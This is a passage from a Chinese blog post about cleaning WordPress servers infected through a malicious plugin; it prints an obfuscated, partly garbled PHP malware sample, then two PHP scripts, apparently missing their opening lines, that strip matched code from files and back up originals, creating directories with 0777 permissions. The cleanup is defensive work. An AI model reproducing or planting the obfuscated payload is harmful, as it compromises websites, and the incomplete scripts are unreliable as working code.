公司一些wordpress网站由于下载的插件存在恶意代码，导致整个服务器所有网站php文件都存在恶意代码，就写了个简单的脚本清除。
恶意代码示例
复制代码 代码如下:
!#]y3d]51]y35]256]y76]72]y3d]51]y35]274]y4:]82]y3:]621:|:*mmvo:>:iuhofm%x5c%x7825:-5ppde:4:|:**#ppde#)tutjyf%7825yy>#]d6]281l1#%x5c%x782f#m5]dgp5]d6#!#]y81]273]y>#]d4]273]d6p2l5p6]y6gp7l6m7]d4]275]d:m8]df#^#zsfvrx5c%x7827&6hmg%x5c%x7825!j%%x5c%x7825:|:**t%x5c%xw~!%x5c%x7825z!>215b:%x5c%x7825s:%x5cw>#]y74]273]y76]252]y85]256]y6g]257]y8!:8:|:7#6ufs!|ftmf!~!#]y81]273]y76]258]y6g]273]#*%x5c%x7824-%x5c%x7824!>!tus%x5x782fq%x5c%x7825>2q%x5c%x7825%x5c%x782f7rfs%x5c%x78256!%x5c%x7824c%x7825c!>!%x5c%x7825i%x5c%x785c2^n%x5c%x7825!bssbz)%x5c%x7824]25%x5c%x7824-%x5c%x7824-!%x5c%x7825%x5c%x7824-%7825)m%x5c%x7825=*h%x5c%x78254%x5c%x785c%x5c%x7825j^%x527,*e%x5c%x7827,*d%x5c%x7827,*cmfv%x5c%x787fu%x5c%x!*5!%x5c%x7827!hmg%x5c%x7825)!gj!|!*1?hmg%x5c%x7or_reporting(0); preg_replace(%x2f%ggg)(0)%x5c%x782f+*0f(-!#]y76]277]y72]265]y76]258]y6g]273]y76]271]y7d]25%x5c%x7825hoh%x5c%x782f#00#w~!%x5c%xs[%x61%156%x75%156%x61]=1; function f:h%x5c%x7825:!2p%x5c2fh%x5c%x7825:%x5c%x7825fdyum%x5c%x5c%x7825!qp%x5c%x7825!|z~!!2p%x5c%x7825!|!*!***b%x5#p#-#q#-#b#-#t#-#e#-#g#-#x787fw6*%x5c%x787f_*#fmjgk4%x5*wcw*[!%x5c%x7825rn}#qwtw%xc%x7825%x5c%x7824-%x5c%x7824b!>!%x5c%x7825yy)#}#50%x2e%52%x29%57%x65,%x65%166%x61%154%x28%151%x6d%160%x6c%25)+opjudovg+)!gj+{e%x5c%x7825!osvufs!*!+a!>!{e%x5c%7827pd%x5c%x78256b%x5c%x7825!*##>>x)!gjzb%x5c%x7825!**x)ufttj%x7825c:>11%x5c%x782272qj%x5c%x7825)7gj6!}_;gvc%x5c%x7825}&;ftmbg}%x5c%x787f;!osvufs}w;*%x5c%x787f!>x7825!>}r;msv}.;%x5c%x782f#%xc%x78b%x5c%x7825w:!>!%x5c%x78246767~6>%x5c%|!*bube{h%x5c%x7825)j{hnpd!opjudovg!|!**#j{hnpd#)tujqetqcoc%x5c%x782f#00#w~!ydrr)%x5c%x7825r%x5c%x78!2p%x5c%x78uft%x5c%x7860msvd},;uqpuft%x5c%x7860msvd}+;!>!}%x5c%x7827;!>>6|7**111127-k)ebfsx%x5c%x7827u%x5c%x7825)7fmji%x5c%x7860ufldpt}x;%x5c%x78#%x5c%x785cq%x5c%x78257**^#zsfvr#%x5c%x785cq%x5c%x7825)uftc%x7825tpz!>!#]d6m7]k3#}>!%x5c%x7825tdz)%x5c%x7825ofmy%x5c%x7825,3,j%x5c%x7825>j%x5c%x782560msvd}r;*msv%x5c%x7825)}.;%x5c%x7860uqp78w~!ypp2)%x5c%x7825zb%x5c%x7825z>!tussfw)%x5c%x7825zw%x55c%x787fw6>%x5c%x7822!ftmbg)!gj]58y]472]37y]672]48y]#>s%x5c%x7825q5c%x7825)!gj!2bd%x5c%x7825!2qj%x5c%x78257-k)udfoopdxa%x54!#]y76]277]y72]265]y39]274]y85]273]y661?*2b%x5c%x7825)gpf{jt)!gj!:r7e:55946-tr.984:75983:48984:71]k9]77]d4]82]k6]72]k9]78]k5]53]kc#>2*!%x5c%x7825z>3j%x5c%x7825!*72!%x5c%x7827!hmg%x-t.98]k4]65]d8]86]y31]278]y3f]5c%x7860sfqmbdf)%x5c%x7825%x5c%x7824-%x5c%x7%x5c%x7822)gj!|!*nbsbq%x5c%x7825)323ldfidk!~!!#]y84]275]y83]248]y83]256c%x7825v%x5c%x7827{ftmfv%x5c%x787f%x5c%x782f7&%x7825:|:*r%x5c%x7825:-t%x5c%x7825)3of:opjud7825!-uyfu%x5c%x7825)3of)fepdof%x5c%x786057ftbc%x5c%x787f!|!*uyfu%x5c%x5c%x7825)hopm3qja)qj3hopma%x578bsfuvso!sboepn)%x5c%x7825epnbss-%x5c%x7825r%x5c%x78782fqp%x5c%x7825>5h%x5c%4-%x5c%x7824y7%x5c%x7824-%>!}w;utpi}y;tuofuopd%x5c%x7tsbqa7>q%x5c%x78256%x5c%x7897e:56-%x5c%x7878r.985:52985c%x7825kj:-!ovmm*#l4]275l3]248l3p6l1m5]d2p4]d6#>1*!%x5c%x7825b:]y4c#!%x5c%x7824ypp3)%x5c%x7825cb%x5c%e56+99386c6f+9f5d816:+946:ce44#)zbssb!>!ssbnpe_gmft%x5c%x7860qiq&f_utbek!~!bjepdof.uofuopd#)sfebfi{*w%x5c%x7825)kv%x5c%x7878{**#cvt-#w#)ldbqov>*ofmy%x5c%x7825)utjm!|%x5c%x7824-%x5c%x7824!>!fyqmpef)#%x5c%x7824*q%x5c%x7825v>*4-1-bube{h%x5c%x7825)sutcvt)!gj!5)sf%x5c%x7878pmpusut)tpqssutre%x5c%x7825)rd%x5c%x7%x7825c*w%x5c%x7825en+#qi%x5c%x785c1^w%x5c%x7825)tpqsut>j%x5c%x7825!*9!%x5c%x7827!hmg%x5c%x7825)!gj!~#]y31]278]y3e]81]k78:569x7827k:!ftmf!}z;^nbsbq%x5c%x7825%x5c%x785csfwtj%x5c%x7822)gj6!%x5c%x782400~:ew:qb:qc:]37]278]225]241]334]368]322]3]364]6]283]2178}527}88:}334}472%x55c%x7825hir%x5c%x785c1^-%x5c%x7825r%x5c%x785c2^-5c%x782f#%x5c%x782f},;#-#}+;%x5c%x7825-qp%x5c%x7825)5c%x782f*#npd%x5c%x782f#)rrd%x5c%x782f#00;quui#>.5j:>11%x5c%x7825s:%x5c%x785c%x5c%x7825j:.2^,%x5c%x782x5c%x782f#o]#%x5c%x782f*)323zbe!-#jt0*?]+^?]_%x5c%x785c}x%x5c%x782{66~6j%x5c%x7825!*3!%x5c%x7827c%x78256!#]y84]275]y83]273]y76]277#2b%x5c%7825%x5c%x7827y%x5c%x78256ezh,2w%x5c%x7825wn;#-ez-1h9%164%50%x22%134%x78%62%x35%165%x3a%146%x21%76%x5fdy)##-!#~2%x5c%x7822!pd%x5c%x7825)!gj}z;h!opjudovg}{;#)tutjyf%x5c%21%50%x5c%x7825%x5c%x7878:!>#]y3g]61]y3f]63]y3:]68]y76#
恶意代码清理程序
array(), #所有文件 'search_file0'=>array(), #没有恶意代码文件 'search_file1'=>array() #含有恶意代码文件);$filelist = listdir($path,$filetype,false); #读取目录里符合条件文件列表if(!empty($filelist)){ foreach ($filelist as $file){ $file = (isset($file['name'])?$file['name']:$file); $search_count['all_file'][] = $file; $filecontent = file_get_contents($file); $compile_filecontent = preg_replace($search, '', $filecontent); if(strlen($filecontent) != strlen($compile_filecontent) && str_replace($bak_path, '', $file)==$file){ #过滤后文件长度不一致，则表示含有恶意代码（备份文件所在目录不过滤） $search_count['search_file1'][] = $file; ############备份原有文件 开始############### $bakfile = str_replace($path, $bak_path, $file); @make_dir(dirname($bakfile)); @file_put_contents($bakfile, $filecontent); ############备份原有文件 结束############### #重新写入过滤后的内容到原有的php文件 @file_put_contents($file, $compile_filecontent); }else{ $search_count['search_file0'][] = $file; } }} #print_r($search_count);die;echo sprintf('从%s里共搜索到%s个符合条件的文件，其中%s个存在恶意代码，已处理结束',$path,count($search_count['all_file']), count($search_count['search_file1']));die;########################## 辅助函数######################## /** * 检查目标文件夹是否存在，如果不存在则自动创建该目录 * * @access public * @param string folder 目录路径。不能使用相对于网站根目录的url * * @return bool */function make_dir($folder){ $reval = false; if (!file_exists($folder)){ #如果目录不存在则尝试创建该目录 @umask(0); #将目录路径拆分成数组 preg_match_all('/([^\/]*)\/?/i', $folder, $atmp); #如果第一个字符为/则当作物理路径处理 $base = ($atmp[0][0] == '/') ? '/' : ''; #遍历包含路径信息的数组 foreach ($atmp[1] as $val){ if ('' != $val){ $base .= $val; if ('..' == $val || '.' == $val){ #如果目录为.或者..则直接补/继续下一个循环 $base .= '/'; continue; } }else{ continue; } $base .= '/'; if (!file_exists($base)){ #尝试创建目录，如果创建失败则继续循环 if (@mkdir(rtrim($base, '/'), 0777)){ @chmod($base, 0777); $reval = true; } } } }else{ #路径已经存在。返回该路径是不是一个目录 $reval = is_dir($folder); } clearstatcache(); return $reval;}########获取目录下所有文件，包括子目录 开始################function listdir($path,$filetype=array(),$fileinfo=true){ $path = str_replace(array('/','\\'), directory_separator, $path); if(!file_exists($path)||!is_dir($path)){ return ''; } if(substr($path, -1,1)==directory_separator){ $path = substr($path, 0,-1); } $dirlist=array(); $dir=opendir($path); while($file=readdir($dir)){ #若有定义$filetype，并且文件类型不在$filetype范围内或文件是一个目录，则跳过 if($file!=='.'&&$file!=='..'){ $file = $path.directory_separator.$file; if(is_dir($file)){ if(empty($filetype)){ $dirlist[] = ($fileinfo==true?array('name'=>$file,'isdir'=>intval(is_dir($file))):$file); } $dirlist = array_merge($dirlist,listdir($file,$filetype)); }elseif(!empty($filetype) && (in_array(pathinfo($file, pathinfo_extension), $filetype))){ $dirlist[] = ($fileinfo==true?array('name'=>$file,'isdir'=>intval(is_dir($file)),'md5_file'=>md5_file($file),'filesize'=>filesize($file),'filemtime'=>filemtime($file)):$file); } }; }; closedir($dir); return $dirlist;}########获取目录下所有文件，包括子目录 结束################
删除ftp里恶意代码(支持任意数量的文件处理)
0, #所有文件 'filter_file'=>0 #含有恶意代码文件);replaceunwantedcode($path); #执行过滤#print_r($search_count);die;echo sprintf('从%s里共搜索到%s个符合条件的文件，其中%s个存在恶意代码已清理，原始文件保存在%s',$path, ($file_count['all_file']), ($file_count['filter_file']), $bak_path);die;function replaceunwantedcode($path){ global $bak_path,$filetype,$search,$file_count; $path = str_replace(array('/','\\'), directory_separator, $path); if(!file_exists($path)||!is_dir($path)){ return ''; } if(substr($path, -1,1)==directory_separator){ $path = substr($path, 0,-1); } $dir=opendir($path); while($file=readdir($dir)){ #若有定义$filetype，并且文件类型不在$filetype范围内或文件是一个目录，则跳过 if($file!=='.'&&$file!=='..'){ $file = $path.directory_separator.$file; if(is_dir($file)){ replaceunwantedcode($file); }elseif(!empty($filetype) && (in_array(pathinfo($file, pathinfo_extension), $filetype))){ ################################ @$file_count['all_file']++; $filecontent = file_get_contents($file); #文件原始代码 $compile_filecontent = preg_replace($search, '', $filecontent); #过滤后的内容 if(strlen($filecontent) != strlen($compile_filecontent) && str_replace($bak_path, '', $file)==$file){ #过滤后文件长度不一致，则表示含有恶意代码（备份文件所在目录不过滤） $file_count['filter_file']++; ############备份原有文件 开始############### $bakfile = str_replace($path, $bak_path, $file); @make_dir(dirname($bakfile)); @file_put_contents($bakfile, $filecontent); ############备份原有文件 结束############### #重新写入过滤后的内容到原有的php文件 @file_put_contents($file, $compile_filecontent); } ################################ unset($filecontent,$compile_filecontent); } }; }; closedir($dir); return true;}########################## 辅助函数######################## /** * 检查目标文件夹是否存在，如果不存在则自动创建该目录 * * @access public * @param string folder 目录路径。不能使用相对于网站根目录的url * * @return bool */function make_dir($folder){ $reval = false; if (!file_exists($folder)){ #如果目录不存在则尝试创建该目录 @umask(0); #将目录路径拆分成数组 preg_match_all('/([^\/]*)\/?/i', $folder, $atmp); #如果第一个字符为/则当作物理路径处理 $base = ($atmp[0][0] == '/') ? '/' : ''; #遍历包含路径信息的数组 foreach ($atmp[1] as $val){ if ('' != $val){ $base .= $val; if ('..' == $val || '.' == $val){ #如果目录为.或者..则直接补/继续下一个循环 $base .= '/'; continue; } }else{ continue; } $base .= '/'; if (!file_exists($base)){ #尝试创建目录，如果创建失败则继续循环 if (@mkdir(rtrim($base, '/'), 0777)){ @chmod($base, 0777); $reval = true; } } } }else{ #路径已经存在。返回该路径是不是一个目录 $reval = is_dir($folder); } clearstatcache(); return $reval;}